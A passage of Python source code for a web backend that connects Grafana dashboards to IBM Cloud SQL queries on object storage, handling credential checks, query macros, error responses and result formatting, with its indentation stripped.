df = sqlClient.get_schema_data(source_cos_url, type=format_type)
if len(df) == 1 and df["name"][0] == "_corrupt_record":
msg = "Check format for source COS URL"
raise HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
)
elif source_type == SourceType.TABLE:
df = sqlClient.describe_table(table)
if df is None:
msg = "Check if table name is correct"
raise HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
)
# data_schema[source_cos_url] = sqlClient.get_schema_data(source_cos_url, type=format_type)
print("Login ok")
# response.status = 200
response.status = "200 API Key valid"
# return json.dumps({ 'status': 'success', 'message': 'Success',"data": {} }), 200
theBody = "Login ok."
response.body = theBody
# safe to update
grafanaPluginInstances[key] = body
grafanaPluginInstances.save()
return response
except (ibm_botocore.exceptions.CredentialRetrievalError, AttributeError):
# return BaseResponse(body='Invalid API key', status=401)
msg = "Invalid API key"
if DEBUG:
print(msg)
# response.body = json.dumps({'error':msg})
raise HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
)
except CosUrlNotFoundException as e:
msg = "Wrong COS URL (either source or target) authentication"
raise HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
)
except SqlQueryCrnInvalidFormatException as e:
msg = "Wrong Sql Query CRN"
raise HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
)
except HTTPResponse as e:
raise e
except Exception as error:
msg = "Unknown error: {}".format(str(type(error)))
raise HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
)
@app.hook("after_request")
def enable_cors():
"""
Grafana makes AJAX call to the data source in either proxy-mode or direct-mode.
In proxy-mode, Grafana uses its own backend server, and add CORS header to the request.
In direct mode, Grafana sends directly to the rest API app, so the request should contains the CORS request
so that the browser allows Grafana to get the result.
"""
print("after_request hook: enable_cors")
for key in response.headers.keys():
print(response.headers.getall(key))
print("----------")
response.headers["Access-Control-Allow-Origin"] = "*"
response.headers["Access-Control-Allow-Methods"] = "OPTIONS"
response.headers["Access-Control-Allow-Headers"] = "Accept, Content-Type"
@app.hook("after_request")
def add_hostname_info():
"""when deploying the webapp via Docker container,
it is good to know the location for debug purpose
return the three-letter location name and the container number from the end of the hostname string.
"""
print("after_request hook: add hostname-info")
for key in response.headers.keys():
print(key, ": ", response.headers.getall(key))
print("----------")
env_host = str(os.environ.get("HOSTNAME"))
hostname = re.findall("[a-z]{3}-\d$", env_host)
if hostname:
response.headers["SP-LOCATION"] = hostname
return response
pass
@app.post("/search")
def search():
"""Return a HTTPResponse containing a JSON array
with the names of the data series available
* headers that specify that this is response is JSON.
Returns
-------
HTTPResponse
list of name of the data series
"""
print(request)
return HTTPResponse(
body=json_dumps(["series A", "series B"]),
headers={"Content-Type": "application/json"},
)
@app.post("/query")
def query():
"""Handle the query from Grafana
This endpoint can return either
* time-series data
* a table for each series
Grafana sends a request which specifies that it queries for the tabular data.
The request is a JSON as
.. console-block: python
'targets': [{'target': 'series B', 'refId': 'A', 'type': 'table'}]
Grafana expects the time-series data in the format
* datapoints are a list of value and unixtimestamp in milliseconds.
.. console-block: python
[
{
"target":"series A", // The field being queried for
"datapoints":[
[622,1450754160000], // Metric value as a float , unixtimestamp in milliseconds
[365,1450754220000]
]
},
{
"target":"series B",
"datapoints":[
[861,1450754160000],
[767,1450754220000]
]
}
]
Returns
-------
[type]
[description]
"""
# if key in grafanaPluginInstances.keys():
# body = grafanaPluginInstances[key]
# else:
# grafanaPluginInstances[key] = body
logger.debug("========= PRINT REQUEST ============")
logger.debug(request.body.read().decode("utf-8"))
logger.debug("========= END PRINT REQUEST ============")
body = request.body.read().decode("utf-8")
body = json.loads(body)
import pprint
logger.debug("========= PRINT body of REQUEST ============")
pprint.pprint(body, width=1)
logger.debug("========= END PRINT body of REQUEST ============")
# check to see if it's safe to launch
query = body["targets"][0]
id = query["id"]
id_name = id#"dummy_string"
name = query["name"]
key = gen_key(id_name, name)
key_refId = gen_key_refId(body["dashboardId"], body["panelId"], query["refId"])
sql_stmt = query["queryText"]
sleep_time = max(2.0, min(15.0, 2 * len(body["targets"])))
if not grafanaPluginInstances.should_sql_stmt_be_run(
key, key_refId, sql_stmt, sleep_time
):
# don't launch any
body = json_dumps([])
return HTTPResponse(body=body, headers={"Content-Type": "application/json"})
# launch now
# loop through all queries and process it
resp_body = []
sqlClient = None
key = None
for query in body["targets"]:
if "hide" in query and query["hide"] is True:
continue
res, error_obj = process_query(query, body, sqlClient=sqlClient, old_key=key)
if error_obj is not None:
raise error_obj
if isinstance(res, list):
for r in res:
resp_body.append(r)
if res is None:
# get_result <- False
pass
else:
resp_body.append(res)
body = json_dumps(resp_body)
return HTTPResponse(body=body, headers={"Content-Type": "application/json"})
def process_query(fullquery, body, sqlClient=None, old_key=None):
"""
Parameters
------------
fullquery: dict
The dict object with all information required to launch a query
body: dict
The body of the original full HTTP request
sqlClient: SQLClient
The object that can launch the sql stmt string
old_key: str
The key which tracks the given sqlClient object
Returns
--------
returns a tuple (result, error_object)
None, error_object --> error is detected
result, None --> result
None, None --> when result is not needed [intermediate result]
NOTE: A result can be a dict{} : represent a single time-series data or single table data
or a list of dict: represent multiple time-series data
"""
# i = i-th query
# fullquery = body["targets"][i]
result = None
data_type = "TableData"
if "format" in fullquery and fullquery["format"] == "time_series":
data_type = "TimeSeries"
if "queryText" not in fullquery:
# don't run further
# TODO - return empty things
return {}, None
sql_stmt = fullquery["queryText"]
if len(sql_stmt.strip()) == 0:
return None, None
logger.debug("========= PRINT sql_stmt ============")
logger.debug(sql_stmt)
logger.debug("========= END PRINT sql_stmt ============")
# id = fullquery["id"]
id_name = fullquery["id"] #"dummy_string"
name = fullquery["name"]
key = gen_key(id_name, name)
# TODO : calculate these and check if SQL query uses
# 'DAY' 'MONTH' 'YEAR' to replace it with:
# DAY between day_from and day_to
# MONTH between month_from and month_to
# YEAR between year_from and year_to
#
from dateutil import parser
dt_from = parser.parse(body["range"]["from"])
dt_to = parser.parse(body["range"]["to"])
sdt_from = body["range"]["from"]
sdt_to = body["range"]["to"]
if len(get_columns_from_single_select(sql_stmt)) == 0 and re.search(
r"(?i)^\s*select", sql_stmt
):
msg = "The 'SELECT *' is being used: Not accepted in the query with Id {}".format(
fullquery["refId"]
)
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
columns = parse_sql_columns(sql_stmt)
columns_from_to = find_column_mapping(sql_stmt, columns)
if len(columns) > 0:
# find the column containing time - for time replacement
# when $__timeFilter() is used
time_col = columns[0]
if "time_column" in fullquery:
tmp = fullquery["time_column"].strip()
if len(tmp) > 0:
time_col = tmp
if time_col not in columns:
msg = "The name for time-column {} doesn't match with the column(s) in the query with Id {}".format(
time_col, fullquery["refId"]
)
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
sql_stmt = process_macro_timeFilterColumn(
p_timeFilterColumn, sql_stmt, sdt_from, sdt_to
)
patterns = p_timeFilter.findall(sql_stmt)
for pattern in patterns:
pattern = p_timeFilter.search(sql_stmt)
if pattern:
# the $__timeFilter is used
appname = pattern.group(1).strip().lower()
substr = ""
# process for regular data
type_of_column = appname
if "string" == type_of_column:
# the type is string
# if {time_col} is in timestamp
substr += """ to_timestamp({time_col}) BETWEEN to_timestamp("{dt_from}") and to_timestamp("{dt_to}")""".format(
time_col=time_col, dt_from=sdt_from, dt_to=sdt_to
)
else:
# flake8: noqa = E501
substr += """ cast({time_col}/1000 as long) BETWEEN to_unix_timestamp(to_timestamp("{dt_from}")) and to_unix_timestamp(to_timestamp("{dt_to}"))""".format(
time_col=time_col, dt_from=sdt_from, dt_to=sdt_to
) # noqa = E501
sql_stmt = p_timeFilter.sub(substr, sql_stmt, count=1)
sql_stmt = process_macro_data_source(
p_cos_in, grafanaPluginInstances.get_cos_source, key, sql_stmt
)
sql_stmt = process_macro_data_source(
p_cos_in_using, grafanaPluginInstances.get_cos_source_using, key, sql_stmt
)
p_reg = p_cos_in_test
patterns = p_reg.findall(sql_stmt)
for pattern in patterns:
pattern = p_reg.search(sql_stmt)
if pattern.group(1) is None:
# $__source_test
ts_form = ""
else:
# $__source_test()
ts_form = re.sub(r"\(|\)", "", pattern.group(1).strip().lower())
substr = ""
if ts_form in ["ts", ""]: # single time-series"
substr = grafanaPluginInstances.get_sts_random_data(key, dt_from, dt_to)
if "mts" == ts_form: # multipletime-series"
substr = grafanaPluginInstances.get_mts_random_data(key, dt_from, dt_to)
if pattern:
# the $__source_test is used
sql_stmt = p_reg.sub(substr, sql_stmt, count=1)
# get source COS URL as the output of a previous query
p_reg = p_cos_in_prev
patterns = p_reg.findall(sql_stmt)
for pattern in patterns:
pattern = p_reg.search(sql_stmt)
if pattern.group(1) is None:
# $__source_prev
msg = "Need to specify refId name in $__source_prev, e.g. $__source_prev(A)"
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
else:
# $__source_prev()
prev_refId_name = re.sub(r"\(|\)", "", pattern.group(1).strip())
substr = ""
if len(prev_refId_name) == 0:
msg = "Need to specify refId name in $__source_prev, e.g. $__source_prev(A)"
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
# TODO
# May extend here to allow reading data from another panel and/or dashboard
key_refId = gen_key_refId(body["dashboardId"], body["panelId"], prev_refId_name)
try:
substr = grafanaPluginInstances.get_cos_source_prev(key, key_refId)
except KeyError:
msg = (
"The name {} used in $__source_prev()"
"does not exist or is not the prior sql statement in the chain"
).format(prev_refId_name)
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
if pattern:
# the $__source_test is used
sql_stmt = p_reg.sub(substr, sql_stmt, count=1)
# get target COS URL
p_reg = p_cos_out
patterns = p_reg.findall(sql_stmt)
for _ in patterns:
pattern = p_reg.search(sql_stmt)
substr = ""
if pattern.group(1) is None:
# $__dest
substr = ""
else:
# $__dest()
# $__dest(<format> [,suffix])
# Example:
# $__dest(parquet)
# $__dest(parquet, a/b/c)
args_str = re.sub(r"\(|\)", "", pattern.group(1).strip())
if len(args_str) > 0:
arg_list = args_str.split(",")
if len(arg_list) > 2:
msg = "$__dest() can't have more than two arguments"
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
if len(arg_list) == 1:
# must be format type
format_type = arg_list[0].upper()
suffix = ""
else:
format_type = arg_list[0].upper()
suffix = arg_list[1].strip()
if format_type not in ["PARQUET", "AVRO", "CSV", "JSON", "ORC"]:
pass
msg = "Invalid format of data used in $__dest macro"
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
substr = grafanaPluginInstances.get_cos_dest(key, suffix, format_type)
if pattern:
# the $__source_test is used
sql_stmt = p_reg.sub(substr, sql_stmt, count=1)
try:
while True:
try:
sql_stmt = format_sql(sql_stmt)
sql_stmt = sql_stmt.replace("\\'", '"')
# logger.info("Query to be issued:\n", sql_stmt)
# TODO: convert this to a function with
# and decorate the function with @functools.lru_cache
# https://docs.python.org/3.4/library/functools.html#functools.lru_cache
df = None
key_refId = gen_key_refId(
body["dashboardId"], body["panelId"], fullquery["refId"]
)
# for some reason Grafana sends twice, and this to prevent from running twice on Cloud SQL
# there is a chance that a new query will be sent shortly which override the current
# one - as we can't cancel a launched SQL Query --> so we put in the queue and
# wait a little before before really launch it
# if not grafanaPluginInstances.should_sql_stmt_be_run(key, key_refId, sql_stmt):
# break
# TODO - consider allow users to request 'rerun
rerun = False
if sqlClient:
assert old_key == key
if "get_result" in fullquery and fullquery["get_result"] is False:
job_id = query_data_noresultback(
key, sql_stmt, rerun=rerun, sqlClient=sqlClient
)
else:
df, job_id = query_data(
key, key_refId, sql_stmt, rerun=rerun, sqlClient=sqlClient
)
if df is None:
msg = "Query {}: no data returned or query failed due to timeout".format(
fullquery["refId"]
)
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
# a unique reference needs dashboardId + panelid + refid
# TODO : When the webapp is shared by multiple instances of Grafana
# --> maybe the dashboardId and panelId can be the same for those from
# two Grafana instance --> need to resolve this
grafanaPluginInstances.save_job_id(key, key_refId, job_id)
break
except RateLimitedException:
sleep(10)
except TooManyRowsException as e:
msg = "The query returns too many rows - please revise it"
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
except NoResultException as e:
msg = "The query returns nothing - please revise it"
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
if "get_result" in fullquery and fullquery["get_result"] is False:
return None, None
except CosUrlInaccessibleException as e:
msg = "Query {}: Check if you use the right data-source: {}".format(
fullquery["refId"], str(e)
)
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
except Exception as e:
msg = "Query {}: unknown error {}".format(fullquery["refId"], str(e))
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
logger.info("RESULT is available")
if df is None:
# no data returned
msg = "Query {}: No data returned: check the time rang".format(
fullquery["refId"]
)
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
# make NaN to empty string to so that client can understand
df.replace(np.nan, "", regex=True, inplace=True)
if data_type == "TimeSeries":
# In TypeScript:
# export type TimeSeriesValue = string | number | null;
# export type TimeSeriesPoints = TimeSeriesValue[][];
# export interface TimeSeries {
# target: string;
# datapoints: TimeSeriesPoints;
# unit?: string;
# }
# [TimeSeries] body must be a list, an element is a dict with 2 fields
# . 'target' = name of a series
# . 'datapoint' = the 2D data [row][col]
# . 'unit' = (optional)
# {'target': name, 'datapoints': datapoints})
# DataFrame
"""
https://github.com/grafana/grafana/blob/master/packages/grafana-data/src/dataframe/processDataFrame.ts
{
name: timeSeries.target || (timeSeries as any).name,
refId: timeSeries.refId,
meta: timeSeries.meta,
fields,
length: values.length, // # rows in DataFrame
};
which means we return a dict
{
'name': name,
'refId': refId,
'meta': any metadata,
'length': numeric, // # rows in DataFrame
'fields': [
{
'name': col-name, // e.g. 'Time'
'type': 'fieldtype', //see above
'config': {}, //optional
'values': [list-of-values]
},
{
'name': col-name, //e.g. 'Value'
'type': 'fieldtype', //see above
config: {
unit: "a unit-here",
},
'values': [list-of-values]
'labels': 'original a 'tag' attribute in timeSeries'
}
]
}
"""
time_col = df.columns[0]
if "time_column" in fullquery:
tmp = fullquery["time_column"].strip()
if len(tmp) > 0:
time_col = tmp
if time_col in columns_from_to:
time_col = columns_from_to[time_col]
df = revise_time_column(time_col, df)
logger.debug("========= PRINT result of sql_stmt ============")
logger.debug(type(df))
logger.debug(".. .first 5 rows")
logger.debug(df.head(5))
logger.debug("========= END PRINT result of sql_stmt ============")
name = "series" + fullquery["refId"]
col_names = list(df.columns)
index = col_names.index(time_col)
# IMPORTANT: 2nd column must be timestamp
if index != 1:
tmp = col_names[1]
col_names[1] = time_col
col_names[index] = tmp
if len(col_names) > 2:
# process MTS (multi-time-series)
metrics_col = df.columns[2]
if "metrics_column" in fullquery:
tmp = fullquery["metrics_column"].strip()
if len(tmp) > 0:
metrics_col = tmp
index = col_names.index(metrics_col)
if index == 0:
tmp = col_names[2]
col_names[2] = metrics_col
col_names[index] = tmp
col_names = col_names[0:2]
# try returning multiple time-series
metrics = df[metrics_col].unique()
result = []
for met in metrics:
name = met
df_tmp = df[df[metrics_col].eq(met)]
datapoints = df_tmp[col_names].values.tolist()
result.append({"target": str(name), "datapoints": datapoints})
else:
# process STS (single TS)
datapoints = df[col_names].values.tolist()
# remember that an HTTP request can contain multiple queries, i.e. targets is a list
# that's why the body result should be a list
result = {"target": str(name), "datapoints": datapoints}
elif data_type == "TableData":
# [TableData] body must be a list, an element is a dict with 3 fields
# . 'type': 'table' or 'timeseries'
# . 'columns': a list of len = number of columns, each element is a dict of 2 entries:
# 'text' : field-name, 'type': a string representatin of 'time',
# 'string', 'number' [a value provided by FieldType in Grafana]
# . 'rows' : a list, of len = number of rows, and each entry is a list of values in one row
# 'series A': [{
# "columns":[
# {"text":"Time","type":"time"},
# {"text":"Country","type":"string"},
# {"text":"Number","type":"number"}
# ],
# "rows":[
# [1234567,"SE",123],
# [1234567,"DE",231],
# [1234567,"US",321]
# ],
# "type":"table"
# }],
# body = json_dumps(tabular_data[series])
time_col = ""
if "time_column" in fullquery:
tmp = fullquery["time_column"].strip()
if len(tmp) > 0:
time_col = tmp
if time_col in columns_from_to:
time_col = columns_from_to[time_col]
df = revise_time_column(time_col, df)
mdict = {}
mdict["columns"] = []
y = build_table_schema(df)
for col in y["fields"]:
if col["name"] == "index":
continue
x = {}
x["text"] = col["name"]
stype = ""
if col["type"] in ["integer", "number"]:
stype = "number"
elif col["type"] in ["datetime"] or col["name"] == time_col:
stype = "time"
elif col["type"] in ["string"]:
stype = "string"
elif col["type"] in ["boolean"]:
stype = "boolean"
else:
print("col: ", col["type"])
logger.info("col: ", col["type"])
assert 0
x["type"] = stype
mdict["columns"].append(x)
mdict["rows"] = df.values.tolist()
result = mdict
if DEBUG:
logger.debug("=====")
logger.debug(".. print first 5 rows")
# don't print too long result
import pprint
pprint.pprint(result["columns"], width=1)
pprint.pprint(len(result["rows"]))
# pprint.pprint(result['rows'][1:5], width=1, depth=1)
return result, None
@app.post("/variable")
def variable():
"""Handle the query from Grafana that read the content for a variable which can be
* list of values
* list of label/value pair
Returns
-------
[type]
[description]
"""
# if key in grafanaPluginInstances.keys():
# body = grafanaPluginInstances[key]
# else:
# grafanaPluginInstances[key] = body
print("========= Variable content ============")
print(request)
body = request.body.read().decode("utf-8")
body = json.loads(body)
import pprint
print("========= PRINT body of REQUEST ============")
pprint.pprint(body, width=1)
print("========= END PRINT body of REQUEST ============")
query = body["options"]["variable"]
key = None
# check to see if it's safe to launch
# query = body["targets"][0]
id_name = "dummy_string"
name = query["datasource"]
key = gen_key(id_name, name)
sqlClient = grafanaPluginInstances.get_sqlclient(key, thread_safe=True)
if 0:
key_refId = gen_key_refId("dummy", "dummy", query["id"])
sql_stmt = query["query"]
sleep_time = 2 # seconds
if not grafanaPluginInstances.should_sql_stmt_be_run(
key, key_refId, sql_stmt, sleep_time
):
# don't launch any
body = json_dumps([])
return HTTPResponse(body=body, headers={"Content-Type": "application/json"})
# launch now
# loop through all queries and process it
resp_body = []
# NOTE: There can be multiple query variables defined; but they are sent individually to here
# if "hide" in query and query["hide"] is True:
# continue
# res, error_obj = process_query(query, body, sqlClient=sqlClient, old_key=key)
sql_stmt = query["query"]
data_type = "TableData"
res, error_obj = process_query_variable(query, key, sqlClient)
if error_obj is not None:
raise error_obj
if isinstance(res, list):
for r in res:
resp_body.append(r)
if res is None:
# get_result <- False
assert 0
else:
resp_body.append(res)
# must be an array
body = json_dumps(resp_body)
return HTTPResponse(body=body, headers={"Content-Type": "application/json"})
def process_query_variable(
fullquery,
key,
sqlClient=None,
dt_from=None,
dt_to=None,
sdt_from=None,
sdt_to=None,
):
sql_stmt = fullquery["query"]
data_type = "TableData"
if len(sql_stmt.strip()) == 0:
return None, None
logger.debug("========= PRINT sql_stmt ============")
logger.debug(sql_stmt)
logger.debug("========= END PRINT sql_stmt ============")
# logger.debug('------------------')
# logger.debug(grafanaPluginInstances)
# # store the object connecting to SQL Client service
# logger.debug(grafanaPluginInstancesSqlClient)
# logger.debug('------------------')
# id = fullquery["id"]
# TODO : calculate these and check if SQL query uses
# 'DAY' 'MONTH' 'YEAR' to replace it with:
# DAY between day_from and day_to
# MONTH between month_from and month_to
# YEAR between year_from and year_to
#
if len(get_columns_from_single_select(sql_stmt)) == 0 and re.search(
r"(?i)^\s*select", sql_stmt
):
msg = "The 'SELECT *' is being used: Not accepted in the query with Id {}".format(
fullquery["id"]
)
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
columns = parse_sql_columns(sql_stmt)
columns_from_to = find_column_mapping(sql_stmt, columns)
if len(columns) > 0:
# find the column containing time - for time replacement
# when $__timeFilter() is used
time_col = columns[0]
if "time_column" in fullquery:
tmp = fullquery["time_column"].strip()
if len(tmp) > 0:
time_col = tmp
if time_col not in columns:
msg = "The name for time-column {} doesn't match with the column(s) in the query with Id {}".format(
time_col, fullquery["refId"]
)
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
sql_stmt = process_macro_timeFilterColumn(
p_timeFilterColumn, sql_stmt, sdt_from, sdt_to
)
patterns = p_timeFilter.findall(sql_stmt)
for pattern in patterns:
pattern = p_timeFilter.search(sql_stmt)
if pattern:
# the $__timeFilter is used
appname = pattern.group(1).strip().lower()
substr = ""
if "aiops" == appname:
# process for AIOps data
substr += get_datetime_conditions_aiops(dt_from, dt_to) + " AND "
# process for regular data
type_of_column = appname
if "string" == type_of_column:
# the type is string
# if {time_col} is in timestamp
substr += """ to_timestamp({time_col}) BETWEEN to_timestamp("{dt_from}") and to_timestamp("{dt_to}")""".format(
time_col=time_col, dt_from=sdt_from, dt_to=sdt_to
)
else:
# flake8: noqa = E501
# substr += """ {time_col} >= to_date("{dt_from}") and {time_col} <= to_date("{dt_to}")""".format(time_col=time_col, dt_from=sdt_from, dt_to=sdt_to)
# substr += """ {time_col} BETWEEN "{dt_from}" and "{dt_to}" """.format(time_col=time_col, dt_from=sdt_from, dt_to=sdt_to)
substr += """ cast({time_col}/1000 as long) BETWEEN to_unix_timestamp(to_timestamp("{dt_from}")) and to_unix_timestamp(to_timestamp("{dt_to}"))""".format(
time_col=time_col, dt_from=sdt_from, dt_to=sdt_to
) # noqa = E501
sql_stmt = p_timeFilter.sub(substr, sql_stmt, count=1)
sql_stmt = process_macro_data_source(
p_cos_in, grafanaPluginInstances.get_cos_source, key, sql_stmt
)
sql_stmt = process_macro_data_source(
p_cos_in_using, grafanaPluginInstances.get_cos_source_using, key, sql_stmt
)
# p_reg = p_cos_in
# patterns = p_reg.findall(sql_stmt)
# try:
# substr = grafanaPluginInstances.get_cos_source(key)
# except KeyError:
# # TODO: maybe we want to resend the credential each time - as when deploying to CodeEngine - the storage is not permanent?
# msg = "The webapp doesn't hold CloudSQL info - you may want to revalidate in the datasource setting"
# return None, HTTPResponse(
# body=json.dumps({'error': msg}),
# status=403,
# headers={'Content-type': 'application/json'}
# )
# if len(patterns) > 0 and len(substr) == 0:
# msg = "Can't use $__source (default value has not been configured yet)"
# raise HTTPResponse(
# body=json.dumps({'error': msg}),
# status=403,
# headers={'Content-type': 'application/json'}
# )
# for pattern in patterns:
# pattern = p_reg.search(sql_stmt)
# if pattern:
# # the $__source is used
# sql_stmt = p_reg.sub(substr, sql_stmt, count=1)
# get test_data
p_reg = p_cos_in_test
patterns = p_reg.findall(sql_stmt)
for pattern in patterns:
pattern = p_reg.search(sql_stmt)
if pattern.group(1) is None:
# $__source_test
ts_form = ""
else:
# $__source_test()
ts_form = re.sub(r"\(|\)", "", pattern.group(1).strip().lower())
substr = ""
if ts_form in ["ts", ""]: # single time-series"
substr = grafanaPluginInstances.get_sts_random_data(key, dt_from, dt_to)
if "mts" == ts_form: # multipletime-series"
substr = grafanaPluginInstances.get_mts_random_data(key, dt_from, dt_to)
if pattern:
# the $__source_test is used
sql_stmt = p_reg.sub(substr, sql_stmt, count=1)
# get source COS URL as the output of a previous query
p_reg = p_cos_in_prev
patterns = p_reg.findall(sql_stmt)
for pattern in patterns:
pattern = p_reg.search(sql_stmt)
if pattern.group(1) is None:
# $__source_prev
msg = "Need to specify refId name in $__source_prev, e.g. $__source_prev(A)"
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
else:
# $__source_prev()
prev_refId_name = re.sub(r"\(|\)", "", pattern.group(1).strip())
substr = ""
if len(prev_refId_name) == 0:
msg = "Need to specify refId name in $__source_prev, e.g. $__source_prev(A)"
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
# TODO
# May extend here to allow reading data from another panel and/or dashboard
# key_refId = gen_key_refId(body["dashboardId"], body["panelId"], prev_refId_name)
key_refId = gen_key_refId("dummy", "dummy", prev_refId_name)
try:
substr = grafanaPluginInstances.get_cos_source_prev(key, key_refId)
except KeyError:
msg = (
"The name {} used in $__source_prev()"
"does not exist or is not the prior sql statement in the chain"
).format(prev_refId_name)
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
if pattern:
# the $__source_test is used
sql_stmt = p_reg.sub(substr, sql_stmt, count=1)
# get target COS URL
p_reg = p_cos_out
patterns = p_reg.findall(sql_stmt)
for _ in patterns:
pattern = p_reg.search(sql_stmt)
substr = ""
if pattern.group(1) is None:
# $__dest
substr = ""
else:
# $__dest()
# $__dest(<format> [,suffix])
# Example:
# $__dest(parquet)
# $__dest(parquet, a/b/c)
args_str = re.sub(r"\(|\)", "", pattern.group(1).strip())
if len(args_str) > 0:
arg_list = args_str.split(",")
if len(arg_list) > 2:
msg = "$__dest() can't have more than two arguments"
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
if len(arg_list) == 1:
# must be format type
format_type = arg_list[0].upper()
suffix = ""
else:
format_type = arg_list[0].upper()
suffix = arg_list[1].strip()
if format_type not in ["PARQUET", "AVRO", "CSV", "JSON", "ORC"]:
pass
msg = "Invalid format of data used in $__dest macro"
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
substr = grafanaPluginInstances.get_cos_dest(key, suffix, format_type)
if pattern:
# the $__source_test is used
sql_stmt = p_reg.sub(substr, sql_stmt, count=1)
# print(sql_stmt)
try:
while True:
try:
sql_stmt = format_sql(sql_stmt)
sql_stmt = sql_stmt.replace("\\'", '"')
print("Query to be issued:\n", sql_stmt)
# TODO: convert this to a function with
# and decorate the function with @functools.lru_cache
# https://docs.python.org/3.4/library/functools.html#functools.lru_cache
df = None
key_refId = gen_key_refId("dummy", "dummy", fullquery["id"])
# for some reason Grafana sends twice, and this to prevent from running twice on Cloud SQL
# there is a chance that a new query will be sent shortly which override the current
# one - as we can't cancel a launched SQL Query --> so we put in the queue and
# wait a little before before really launch it
# if not grafanaPluginInstances.should_sql_stmt_be_run(key, key_refId, sql_stmt):
# break
# TODO - consider allow users to request 'rerun
rerun = False
# FIXME - the refId can be changed - so it's not a consistent way to track
job_id = None
if "get_result" in fullquery and fullquery["get_result"] is False:
job_id = query_data_noresultback(
key, sql_stmt, rerun=rerun, sqlClient=sqlClient
)
else:
df, job_id = query_data(
key, key_refId, sql_stmt, rerun=rerun, sqlClient=sqlClient
)
if 0:
# FIXME: 'key' and 'key_refId' are not capable of distuingishing
# queries from two panels
# TODO - it's possibel that user decide to change from 'noresult' to
# 'get-result' so we should avoid rerun if possible
# FIXME - the refId can be changed - so it's not a consistent way to track
job_id = grafanaPluginInstances.get_job_id(key, key_refId)
if job_id is None:
df, job_id = query_data(
key,
key_refId,
sql_stmt,
rerun=rerun,
sqlClient=sqlClient,
)
else:
if sqlClient is None:
sqlClient = grafanaPluginInstances.get_sqlclient(
key, thread_safe=True
)
job_status = sqlClient.wait_for_job(job_id, sleep_time=10)
if job_status == "completed":
df = sqlClient.get_result(job_id)
if df is None:
msg = "Query {}: no data returned or query failed due to timeout".format(
fullquery["id"]
)
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
# a unique reference needs dashboardId + panelid + refid
# TODO : When the webapp is shared by multiple instances of Grafana
# --> maybe the dashboardId and panelId can be the same for those from
# two Grafana instance --> need to resolve this
assert job_id is not None
grafanaPluginInstances.save_job_id(key, key_refId, job_id)
break
except RateLimitedException:
sleep(10)
except TooManyRowsException as e:
msg = "The query returns too many rows - please revise it"
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
except NoResultException as e:
msg = "The query returns nothing - please revise it"
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
if "get_result" in fullquery and fullquery["get_result"] is False:
return None, None
# job_id = sqlClient.submit_sql(sql_stmt, blocking=True)
# ok = False
# while not ok:
# gevent.sleep(20)
# ok = sqlClient.check_job_completion(job_id)
except CosUrlInaccessibleException as e:
msg = "Query {}: Check if you use the right data-source: {}".format(
fullquery["refId"], str(e)
)
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
except Exception as e:
import traceback
traceback.print_exc()
msg = "Query {}: unknown error {}".format(fullquery["id"], str(e))
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
logger.info("RESULT is available")
if df is None:
# no data returned
msg = "Query {}: No data returned: check the time rang".format(fullquery["id"])
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
# make NaN to empty string to so that client can understand
df.replace(np.nan, "", regex=True, inplace=True)
# [TableData] body must be a list, an element is a dict with 3 fields
# . 'type': 'table' or 'timeseries'
# . 'columns': a list of len = number of columns, each element is a dict of 2 entries:
# 'text' : field-name, 'type': a string representatin of 'time',
# 'string', 'number' [a value provided by FieldType in Grafana]
